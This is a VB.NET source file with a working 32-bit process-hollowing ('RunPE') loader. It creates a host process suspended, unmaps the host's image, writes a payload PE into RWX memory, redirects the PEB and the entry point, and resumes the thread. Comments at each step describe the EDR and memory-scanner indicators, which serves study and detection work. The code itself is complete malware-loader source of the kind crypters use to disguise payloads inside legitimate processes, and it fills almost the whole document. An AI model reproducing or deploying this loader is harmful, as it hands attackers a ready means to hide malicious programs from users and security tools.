  1. Imports System.Runtime.InteropServices
  2. Imports System.Threading
  3. Imports System.Reflection
  4. Imports System.Text
  5. Imports System.Security
  6. Imports System.Diagnostics
  7.  
  8.  
  9.  
Class RunPE
' ----------------------------------------------------------------------------
' Process hollowing ("RunPE") loader, annotated from a defender's perspective.
'
' Sequence: the host executable at `path` is created suspended (CreateProcess
' with creationFlags = 4, CREATE_SUSPENDED); the suspended main thread's
' context is read to locate the PEB; the host's own image is unmapped
' (NtUnmapViewOfSection); the PE held in `data` is allocated RWX and written
' headers-then-sections (VirtualAllocEx + WriteProcessMemory); the PEB image
' base and the thread's entry-point register are patched; the thread is
' resumed. Telemetry that correlates this API chain against a single freshly
' created, still-suspended child (process-access, remote-write and
' thread-context events) is the usual detection, and afterwards the running
' image no longer matches the file on disk, which memory scanners report as a
' hollowed process.
'
' Every header offset and CONTEXT index below assumes a 32-bit PE (PE32) and
' the 32-bit x86 CONTEXT layout; nothing here handles PE32+ / x64.
' ----------------------------------------------------------------------------

' SuppressUnmanagedCodeSecurity on each import skips the CAS unmanaged-code
' permission stack walk for that P/Invoke call.
<DllImport("kernel32.dll", EntryPoint:="CreateProcess", CharSet:=CharSet.Unicode), SuppressUnmanagedCodeSecurity> _
Private Shared Function CreateProcess( _
ByVal applicationName As String, _
ByVal commandLine As String, _
ByVal processAttributes As IntPtr, _
ByVal threadAttributes As IntPtr, _
ByVal inheritHandles As Boolean, _
ByVal creationFlags As UInteger, _
ByVal environment As IntPtr, _
ByVal currentDirectory As String, _
ByRef startupInfo As STARTUP_INFORMATION, _
ByRef processInformation As PROCESS_INFORMATION) As Boolean
End Function

' Thread context read/write. `context` is a raw dword array standing in for
' the x86 CONTEXT structure (179 dwords = 716 bytes, see HandleRun).
<DllImport("kernel32.dll", EntryPoint:="GetThreadContext"), SuppressUnmanagedCodeSecurity> _
Private Shared Function GetThreadContext( _
ByVal thread As IntPtr, _
ByVal context As Integer()) As Boolean
End Function

<DllImport("kernel32.dll", EntryPoint:="SetThreadContext"), SuppressUnmanagedCodeSecurity> _
Private Shared Function SetThreadContext( _
ByVal thread As IntPtr, _
ByVal context As Integer()) As Boolean
End Function

' Reads one 32-bit value from the child (used to fetch PEB.ImageBaseAddress).
' Addresses are plain Integer, i.e. 32-bit only.
<DllImport("kernel32.dll", EntryPoint:="ReadProcessMemory"), SuppressUnmanagedCodeSecurity> _
Private Shared Function ReadProcessMemory( _
ByVal process As IntPtr, _
ByVal baseAddress As Integer, _
ByRef buffer As Integer, _
ByVal bufferSize As Integer, _
ByRef bytesRead As Integer) As Boolean
End Function

' Remote write into the child; used for the headers, each section, and the
' PEB image-base pointer. Cross-process writes into a suspended child are a
' primary hollowing indicator for EDR.
<DllImport("kernel32.dll", EntryPoint:="WriteProcessMemory"), SuppressUnmanagedCodeSecurity> _
Private Shared Function WriteProcessMemory( _
ByVal process As IntPtr, _
ByVal baseAddress As Integer, _
ByVal buffer As Byte(), _
ByVal bufferSize As Integer, _
ByRef bytesWritten As Integer) As Boolean
End Function

' Native (ntdll) unmap of the host's original image. Returns NTSTATUS;
' 0 = STATUS_SUCCESS. Seeing this export called on another process's handle
' is rare in benign software.
<DllImport("ntdll.dll", EntryPoint:="NtUnmapViewOfSection"), SuppressUnmanagedCodeSecurity> _
Private Shared Function NtUnmapViewOfSection( _
ByVal process As IntPtr, _
ByVal baseAddress As Integer) As Integer
End Function

' Remote allocation; the result is a 32-bit address (0 on failure).
<DllImport("kernel32.dll", EntryPoint:="VirtualAllocEx"), SuppressUnmanagedCodeSecurity> _
Private Shared Function VirtualAllocEx( _
ByVal handle As IntPtr, _
ByVal address As Integer, _
ByVal length As Integer, _
ByVal type As Integer, _
ByVal protect As Integer) As Integer
End Function

' Returns the previous suspend count, or -1 on failure.
<DllImport("kernel32.dll", EntryPoint:="ResumeThread"), SuppressUnmanagedCodeSecurity> _
Private Shared Function ResumeThread( _
ByVal handle As IntPtr) As Integer
End Function

' Mirrors Win32 PROCESS_INFORMATION (hProcess, hThread, dwProcessId, dwThreadId).
<StructLayout(LayoutKind.Sequential, Pack:=1)> _
Private Structure PROCESS_INFORMATION
Public ProcessHandle As IntPtr
Public ThreadHandle As IntPtr
Public ProcessId As UInteger
Public ThreadId As UInteger
End Structure

' Hand-rolled STARTUPINFOW: the 36-byte Misc array covers the dwX .. cbReserved2
' fields (8 dwords + 2 words) that this code never sets.
<StructLayout(LayoutKind.Sequential, Pack:=1)> _
Private Structure STARTUP_INFORMATION
Public Size As UInteger
Public Reserved1 As String
Public Desktop As String
Public Title As String

<MarshalAs(UnmanagedType.ByValArray, SizeConst:=36)> _
Public Misc As Byte()

Public Reserved2 As IntPtr
Public StdInput As IntPtr
Public StdOutput As IntPtr
Public StdError As IntPtr

End Structure

' Entry point: retries HandleRun up to five times, returning True on the first
' success. Each failed attempt spawns and kills a suspended child, so repeated
' short-lived creations of `path` are a side effect worth noting in telemetry.
Public Shared Function Run(ByVal path As String, ByVal cmd As String, ByVal data As Byte(), ByVal compatible As Boolean) As Boolean
For I As Integer = 1 To 5
If HandleRun(path, cmd, data, compatible) Then Return True
Next

Return False
End Function

' One hollowing attempt. `path` is the host executable, `cmd` optional extra
' command-line text, `data` the payload PE image, `compatible` controls the
' allocation fallback (see step 5). Returns False on any failure.
Private Shared Function HandleRun(ByVal path As String, ByVal cmd As String, ByVal data As Byte(), ByVal compatible As Boolean) As Boolean

' Reused as the bytesRead / bytesWritten out-parameter of every RPM/WPM call.
Dim ReadWrite As Integer
Dim QuotedPath As String = String.Format("""{0}""", path)

Dim SI As New STARTUP_INFORMATION
Dim PI As New PROCESS_INFORMATION

SI.Size = CUInt(Marshal.SizeOf(GetType(STARTUP_INFORMATION)))

Try
' 1. Create the host suspended (creationFlags 4 = CREATE_SUSPENDED). `cmd`,
'    when given, is appended to the quoted host path as its command line,
'    so the child's visible command line is the host's, not the payload's.
If String.IsNullOrEmpty(cmd) Then
If Not CreateProcess(path, QuotedPath, IntPtr.Zero, IntPtr.Zero, False, 4, IntPtr.Zero, Nothing, SI, PI) Then Throw New Exception()
Else
QuotedPath = QuotedPath & " " & cmd
If Not CreateProcess(path, QuotedPath, IntPtr.Zero, IntPtr.Zero, False, 4, IntPtr.Zero, Nothing, SI, PI) Then Throw New Exception()
End If

' 2. Parse the payload's PE headers: data(60) is e_lfanew (offset of the
'    "PE\0\0" header); +52 from there is OptionalHeader.ImageBase (PE32).
Dim FileAddress As Integer = BitConverter.ToInt32(data, 60)
Dim ImageBase As Integer = BitConverter.ToInt32(data, FileAddress + 52)

' 3. Read the suspended thread's context. 179 dwords = 716 bytes = sizeof
'    x86 CONTEXT; Context(0) = &H10002 is ContextFlags = CONTEXT_i386 Or
'    CONTEXT_INTEGER, i.e. only the general-purpose registers are requested.
Dim Context(179 - 1) As Integer
Context(0) = 65538

If Not GetThreadContext(PI.ThreadHandle, Context) Then Throw New Exception()

' At a suspended x86 process start Ebx (dword index 41 of CONTEXT) holds the
' PEB address; PEB+8 is ImageBaseAddress, the host's current image base.
Dim Ebx As Integer = Context(41)
Dim BaseAddress As Integer

If Not ReadProcessMemory(PI.ProcessHandle, Ebx + 8, BaseAddress, 4, ReadWrite) Then Throw New Exception()

' 4. If the host is mapped where the payload wants to live, unmap it
'    (NTSTATUS 0 = success). Otherwise the host image is left in place.
If ImageBase = BaseAddress Then
If Not NtUnmapViewOfSection(PI.ProcessHandle, BaseAddress) = 0 Then Throw New Exception()
End If

' OptionalHeader.SizeOfImage (+80) and SizeOfHeaders (+84).
Dim SizeOfImage As Integer = BitConverter.ToInt32(data, FileAddress + 80)
Dim SizeOfHeaders As Integer = BitConverter.ToInt32(data, FileAddress + 84)

' 5. Reserve+commit (12288 = &H3000 = MEM_COMMIT Or MEM_RESERVE) an RWX
'    region (64 = &H40 = PAGE_EXECUTE_READWRITE) of SizeOfImage at the
'    payload's preferred base. When `compatible` is False a failed
'    preferred-base allocation falls back to any address. A private RWX
'    region of image size inside a suspended child is itself a common
'    memory-scanner indicator.
Dim AllowOverride As Boolean
Dim NewImageBase As Integer = VirtualAllocEx(PI.ProcessHandle, ImageBase, SizeOfImage, 12288, 64)

If Not compatible AndAlso NewImageBase = 0 Then
AllowOverride = True
NewImageBase = VirtualAllocEx(PI.ProcessHandle, 0, SizeOfImage, 12288, 64)
End If

If NewImageBase = 0 Then Throw New Exception()

' 6. Copy the headers, then each section's raw data to its VirtualAddress.
If Not WriteProcessMemory(PI.ProcessHandle, NewImageBase, data, SizeOfHeaders, ReadWrite) Then Throw New Exception()

' Section table starts at PE header + 248 (4-byte signature + 20-byte file
' header + 224-byte PE32 optional header); NumberOfSections is at +6. Each
' IMAGE_SECTION_HEADER is 40 bytes: VirtualAddress +12, SizeOfRawData +16,
' PointerToRawData +20.
Dim SectionOffset As Integer = FileAddress + 248
Dim NumberOfSections As Short = BitConverter.ToInt16(data, FileAddress + 6)

For I As Integer = 0 To NumberOfSections - 1
Dim VirtualAddress As Integer = BitConverter.ToInt32(data, SectionOffset + 12)
Dim SizeOfRawData As Integer = BitConverter.ToInt32(data, SectionOffset + 16)
Dim PointerToRawData As Integer = BitConverter.ToInt32(data, SectionOffset + 20)

' Sections with no raw data (e.g. .bss-style) are skipped.
If Not SizeOfRawData = 0 Then
Dim SectionData(SizeOfRawData - 1) As Byte
Buffer.BlockCopy(data, PointerToRawData, SectionData, 0, SectionData.Length)

If Not WriteProcessMemory(PI.ProcessHandle, NewImageBase + VirtualAddress, SectionData, SectionData.Length, ReadWrite) Then Throw New Exception()
End If

SectionOffset += 40
Next

' 7. Point PEB.ImageBaseAddress at the new image. After this the PEB and the
'    on-disk host no longer agree, which is what hollowing detectors compare.
Dim PointerData As Byte() = BitConverter.GetBytes(NewImageBase)
If Not WriteProcessMemory(PI.ProcessHandle, Ebx + 8, PointerData, 4, ReadWrite) Then Throw New Exception()

' OptionalHeader.AddressOfEntryPoint (+40).
Dim AddressOfEntryPoint As Integer = BitConverter.ToInt32(data, FileAddress + 40)

' 8. Eax (dword index 44), which the loader assumes holds the initial entry
'    point at a suspended x86 start, is redirected to base + entry point.
'    With AllowOverride the sum uses the payload's preferred ImageBase rather
'    than the address actually allocated.
If AllowOverride Then NewImageBase = ImageBase
Context(44) = NewImageBase + AddressOfEntryPoint

' 9. Write the context back and let the thread run. SetThreadContext on a
'    child whose memory was just rewritten is the final step of the chain.
If Not SetThreadContext(PI.ThreadHandle, Context) Then Throw New Exception()
If ResumeThread(PI.ThreadHandle) = -1 Then Throw New Exception()


Catch

' Any failure: kill the suspended child and report False. The exception is
' discarded, so a failed attempt leaves no error detail; in process telemetry
' it appears as a create-suspended followed quickly by a terminate.
Dim P As Process = Process.GetProcessById(CInt(PI.ProcessId))
If P IsNot Nothing Then P.Kill()

Return False

End Try

Return True

End Function

End Class